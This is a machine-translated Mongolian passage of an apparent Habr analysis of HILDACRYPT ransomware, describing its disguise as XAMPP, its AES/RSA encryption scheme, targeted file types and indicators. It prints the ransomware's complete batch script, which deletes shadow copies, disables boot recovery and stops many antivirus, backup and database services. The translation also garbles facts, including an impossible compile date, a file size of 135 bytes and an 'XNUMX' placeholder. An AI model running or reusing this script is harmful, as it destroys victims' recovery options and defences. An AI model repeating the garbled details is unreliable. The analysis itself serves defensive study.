Сайн уу, Хабр! Дахин нэг удаа бид Ransomware ангиллын хортой програмын хамгийн сүүлийн хувилбаруудын талаар ярьж байна. HILDACRYPT нь 2019 оны XNUMX-р сард илрүүлсэн Хилда гэр бүлийн гишүүн бөгөөд програм хангамжийг түгээхэд ашигласан Netflix хүүхэлдэйн киноны нэрээр нэрлэгдсэн шинэ ransomware юм. Өнөөдөр бид энэхүү шинэчлэгдсэн ransomware вирусын техникийн шинж чанаруудтай танилцаж байна.
Hilda ransomware-ийн эхний хувилбарт Youtube дээр байрлуулсан нэгний холбоос
Статик шинжилгээ
Ransomware нь MS Windows-д зориулагдсан PE32 .NET файлд агуулагдаж байна. Түүний хэмжээ нь 135 байт юм. Програмын үндсэн код болон хамгаалагч програмын код хоёулаа C# хэл дээр бичигдсэн. Эмхэтгэсэн огноо, цагийн тэмдгийн дагуу хоёртын систем 168 оны 14-р сарын 2019-нд үүсгэгдсэн.
Detect It Easy-ийн мэдээлснээр, ransomware нь Confuser болон ConfuserEx ашиглан архивлагдсан боловч эдгээр бүдүүлгүүд нь өмнөхтэй ижил, зөвхөн ConfuserEx нь Confuser-ийн залгамжлагч тул кодын гарын үсэг нь төстэй юм.
HILDACRYPT нь үнэхээр ConfuserEx-тэй багцлагдсан байдаг.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Довтолгооны вектор
Хамгийн магадлалтай нь ransomware нь хууль ёсны XAMPP программ мэтээр халхавчлагдсан вэб програмчлалын сайтуудын нэгээс олдсон байх магадлалтай.
Халдварын гинжин хэлхээг бүхэлд нь харж болно
Бухимдал
Ransomware мөрүүдийг шифрлэгдсэн хэлбэрээр хадгалдаг. Эхлэх үед HILDACRYPT нь Base64 болон AES-256-CBC ашиглан тэдгээрийг тайлдаг.
тохиргоо
Юуны өмнө, ransomware нь %AppDataRoaming% дотор GUID (Дэлхий дахинд өвөрмөц танигч) параметрийг санамсаргүй байдлаар үүсгэсэн хавтас үүсгэдэг. Энэ байршилд bat файл нэмснээр ransomware вирус үүнийг cmd.exe ашиглан эхлүүлдэг:
cmd.exe /c JKfgkgj3hjgfhjka.bat & гарах
Дараа нь системийн функц эсвэл үйлчилгээг идэвхгүй болгохын тулд багц скриптийг ажиллуулж эхэлнэ.
Скрипт нь сүүдрийн хуулбарыг устгах, SQL сервер, нөөцлөлт, вирусны эсрэг шийдлүүдийг идэвхгүй болгох командуудын урт жагсаалтыг агуулдаг.
Жишээлбэл, Acronis Backup үйлчилгээг зогсоох оролдлого амжилтгүй болсон. Нэмж дурдахад энэ нь Veeam, Sophos, Kaspersky, McAfee болон бусад үйлдвэрлэгчдийн нөөц систем болон вирусны эсрэг шийдлүүд рүү халддаг.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Дээр дурдсан үйлчилгээ болон процессуудыг идэвхгүй болгосны дараа криптлокер нь шаардлагатай бүх үйлчилгээ зогссон эсэхийг шалгахын тулд tasklist командыг ашиглан ажиллаж байгаа бүх процессын талаарх мэдээллийг цуглуулдаг.
tasklist v/fo csv
Энэ тушаал нь ажиллаж байгаа процессуудын нарийвчилсан жагсаалтыг харуулдаг бөгөөд тэдгээрийн элементүүд нь "," тэмдгээр тусгаарлагдсан байдаг.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Энэхүү шалгалтын дараа ransomware нь шифрлэлтийн процессыг эхлүүлнэ.
Шифрлэлт
Файлын шифрлэлт
HILDACRYPT нь Recycle.Bin болон Reference AssembliesMicrosoft фолдеруудаас бусад хатуу дискний бүх агуулгыг дамжуулдаг. Сүүлийнх нь ransomware-ийн ажиллагаанд нөлөөлж болох .Net програмуудад зориулсан чухал dll, pdb гэх мэт файлуудыг агуулдаг. Шифрлэгдсэн файлуудыг хайхын тулд дараах өргөтгөлүүдийн жагсаалтыг ашиглана.
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ransomware нь хэрэглэгчийн файлуудыг шифрлэхийн тулд AES-256-CBC алгоритмыг ашигладаг. Түлхүүрийн хэмжээ 256 бит, эхлүүлэх вектор (IV) хэмжээ нь 16 байт.
Дараах дэлгэцийн агшинд byte_2 ба byte_1 утгуудыг GetBytes() ашиглан санамсаргүй байдлаар авсан.
Түлхүүр үг
БА
Шифрлэгдсэн файл нь HCY өргөтгөлтэй!.. Энэ бол шифрлэгдсэн файлын жишээ юм. Дээр дурдсан түлхүүр болон IV-г энэ файлд зориулан бүтээсэн.
Түлхүүр шифрлэлт
Cryptolocker нь үүсгэсэн AES түлхүүрийг шифрлэгдсэн файлд хадгалдаг. Шифрлэгдсэн файлын эхний хэсэг нь XML форматын HILDACRYPT, KEY, IV, FileLen зэрэг өгөгдлийг агуулсан толгойтой бөгөөд дараах байдалтай байна.
AES болон IV түлхүүрийн шифрлэлтийг RSA-2048, кодчилолыг Base64 ашиглан хийдэг. RSA нийтийн түлхүүр нь XML форматаар шифрлэгдсэн мөрүүдийн аль нэгэнд нь криптлокерын биед хадгалагддаг.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
RSA нийтийн түлхүүрийг AES файлын түлхүүрийг шифрлэхэд ашигладаг. RSA нийтийн түлхүүр нь Base64 кодлогдсон бөгөөд модуль болон 65537 нийтийн илтгэгчээс бүрдэнэ. Шифрийг тайлахад халдагчид байгаа RSA хувийн түлхүүр шаардлагатай.
RSA шифрлэлтийн дараа AES түлхүүрийг шифрлэгдсэн файлд хадгалагдсан Base64 ашиглан кодчилдог.
Зээлийн мессеж
Шифрлэлт дууссаны дараа HILDACRYPT нь html файлыг шифрлэсэн хавтас руугаа бичдэг. Ransomware мэдэгдэл нь хохирогч халдагчтай холбогдох боломжтой хоёр имэйл хаягийг агуулна.
Хулгайлсан мэдэгдэлд мөн Японд хориотой бяцхан охидын дүр төрхтэй анимэ, манга баатруудын тухай "No loli is safe;)" гэсэн мөр орсон байна.
дүгнэлт
Ransomware-ийн шинэ гэр бүл болох HILDACRYPT шинэ хувилбараа гаргалаа. Шифрлэлтийн загвар нь хохирогчийг ransomware-ээр шифрлэгдсэн файлуудыг тайлахаас сэргийлдэг. Cryptolocker нь нөөц систем болон вирусын эсрэг шийдлүүдтэй холбоотой хамгаалалтын үйлчилгээг идэвхгүй болгохын тулд идэвхтэй хамгаалалтын аргуудыг ашигладаг. HILDACRYPT-ийн зохиогч нь Netflix дээр үзүүлсэн Хилда хүүхэлдэйн киноны шүтэн бишрэгч бөгөөд трэйлерийн линк нь хөтөлбөрийн өмнөх хувилбарыг худалдан авах захидалд агуулагдсан болно.
Ихэнхдээ,
Бууйлтын үзүүлэлтүүд
Файлын өргөтгөл HCY!
HILDACRYPTReadMe.html
xamp.exe нь нэг "p" үсэгтэй, тоон гарын үсэггүй
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Эх сурвалж: www.habr.com